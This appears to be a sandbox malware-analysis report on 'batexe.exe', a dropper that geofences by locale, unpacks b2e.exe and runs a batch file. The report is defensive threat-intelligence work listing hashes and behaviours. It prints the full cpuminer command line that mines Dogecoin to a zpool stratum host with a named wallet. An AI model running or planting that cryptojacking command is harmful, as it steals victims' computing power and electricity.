Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
295s -
max time network
305s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
13/02/2024, 20:27
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 2316 b2e.exe 916 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 916 cpuminer-sse2.exe 916 cpuminer-sse2.exe 916 cpuminer-sse2.exe 916 cpuminer-sse2.exe 916 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/3544-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3544 wrote to memory of 2316 3544 batexe.exe 85 PID 3544 wrote to memory of 2316 3544 batexe.exe 85 PID 3544 wrote to memory of 2316 3544 batexe.exe 85 PID 2316 wrote to memory of 3236 2316 b2e.exe 86 PID 2316 wrote to memory of 3236 2316 b2e.exe 86 PID 2316 wrote to memory of 3236 2316 b2e.exe 86 PID 3236 wrote to memory of 916 3236 cmd.exe 89 PID 3236 wrote to memory of 916 3236 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\Users\Admin\AppData\Local\Temp\776D.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\776D.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\776D.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\85E4.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:916
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.9MB
MD596e462bb5f0478e157eb7a50502aa53d
SHA105141f0b806e5901e0538a892d3bf47a8d5c0065
SHA25649cd37ce474b6519dfda68a61bed9a399cb0a660cfafa6871232afc05ebbe84b
SHA512b3cbc3d6af144a0425b95258882999d1ada3312502f69d98d31139b1ea3fdaf6b6fb4ea7d2cedc668b0729b01dd9bb4289026e87bb3c8658b3c37eb371cfdcf4
-
Filesize
2.5MB
MD51fe2eb522f33b3c6d53b4f76b05b1aa1
SHA173a9b0da531ecf71a4cf1414ed3c8e0ac7ce9ab9
SHA2565ff2605bb293da4eec397f82ecf69cfdea63bf8526195716404150c389ba8cd6
SHA512b64c17992efa8177732bee4288c1d668264d2d94a103a3274ca99cec517ac7364e6175512d0d9e6b27a193a585aa3f0738c3e787a4503277add8e25c63d2ff3a
-
Filesize
2.9MB
MD5ffd8faa823f80da919e7f229d951f1e6
SHA18ead2dc5daced8c083170d081b9943405d48bf93
SHA256a952b09614278542adce13a2ba0f01fb31c4906b60d68b155bf7abf0ffde723a
SHA512b41a46f9fb62a67779a5e9cb51d185843d9d068fe6c00744ae75872a25c6b6ba05d290bd10f0bb053880e231c76821b2a2c334a60361761a1ea93bdd5c2992b3
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
118KB
MD5e3d606a3f48e8c2ddf1af0612d588ab3
SHA16de80e163f1c95d933019bf28897011b1a58b441
SHA256b2fe3923a7bb5530c79539fba220c220ed58baf10b83f15c75f1f23a7a51768a
SHA5127f40c44dc0bb14944ede3747b0dcc413a966f292e891de46fd1ec289669d156b01bf5df434f5762b29dae8e8434637b8ebe3b5e03b9bfe983945ae63aed8b269
-
Filesize
168KB
MD59c834fcd6b7d326082a83b6c23e344d9
SHA1ddf1af8b803e81e7db6d501300d47f1eb32f0a72
SHA256f2f670b6e2ee21addbcbd651a772645bb3061745553e93077cdfcdafe206382d
SHA512e5cfbf3a34574260e3b4c12c4d04582a5379af23d2320696961fb283e7efd7001402f30cd83414a2c1665631637dead990af85f924364ef4270e6472b3c7c688
-
Filesize
5KB
MD56c490d143cab37c3471a7225a08fc1e5
SHA15c55e59318e75e59c162471a3583fb623f0f48e2
SHA256c4eea8eecb0c26425c833eb295acdca434e96133dd64d415a38e886a79c314f8
SHA512667831bb30abb26f9f303bdd5bad78e1d6d9a0e6b6ce22bc508a007f7e3508b7bc07cf1731196a1d5dfda69115cb88e47c904a9c64d0f7d2a244bc82f6fa8a78
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
126KB
MD59f409c7ccd84cb3d844bd7aca4064d5c
SHA10718ad22f9b61b329a64199f3c65f9db00e3a85d
SHA2568d5bf7bf95f2eaea80795ff070ab6a084e24126541b529268f8ac725cc5642a6
SHA5125442bb31afe45ef3916d5b06e7a76fd9af703d6402e4266c94c9cd66803bb62ba331c319b41f4b37a6e0827f0312f8be96456f054620eaa100be1a338b0d94f1
-
Filesize
1.2MB
MD53c2772dfafe1d9c9d6d01de0360890b5
SHA1a594cfdcb62e75fa1f8ba5f8f695b86e7a885295
SHA256b524628aa71369a442005906ec9782a1fcedb5b91bf8d18b4c836a94b71d85fc
SHA512865a4990ec5d01afe458a203f97d190e3500c0327a4fe761eeb1bec6ea52cec185b8cbd0ebdd83b24e96e1f6b5102dffe5e8baaf3bf39081bc86741fb26dfcc2
-
Filesize
167KB
MD5ed0b2236e3ea2a6d41cc32e293f65250
SHA19fb8e9b327245598e208a2213121236fbc6e0a19
SHA256c750a994f592cf032bea7263afd722573e72890b0a21241351acab19d300c390
SHA51230f0ee421462fd8beac9488e2d3fdce83f53d5ed48b55c71bcae98f6c483e5545d3b2e4c0d0b2aa6bc1c6c3b4cde03428417816910d4d93778f69159305afa5f
-
Filesize
1.4MB
MD58ef7827630c5936601eebd4f8d25eb2a
SHA150be5cdd5eb97d4846bea92ff4b449b0de19303f
SHA2567940ad0f941ae12801534010a46f56810a5e9ae798aa76264522e91527d8eac4
SHA512f25e3ad8885222d0d432b98c7a16e42f1529614ee483800a988bfbc324547d9960d9cc3d3c7e47b20cbc1a787c91e4b62bdded9f86d9432a78c2daf0c3950b6a
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770
-
Filesize
14KB
MD557bc28e77ba7f02252d5d1c6ebeb7e33
SHA103d31966e052d14ff5f92d69ceacf8fc886e003c
SHA256094b3dcb3308d87ee8c065d27dc1e0ee818c68d37312bdbc03af9c88f20914aa
SHA512c11bdf493da9bac705cf4d31330ad4bfe2e93c5aa6c0812c47906645e441981880cd651ab20b53e0e9770053d8e3b5a7acdd515ec74f6e16a8c2cdccf49229d4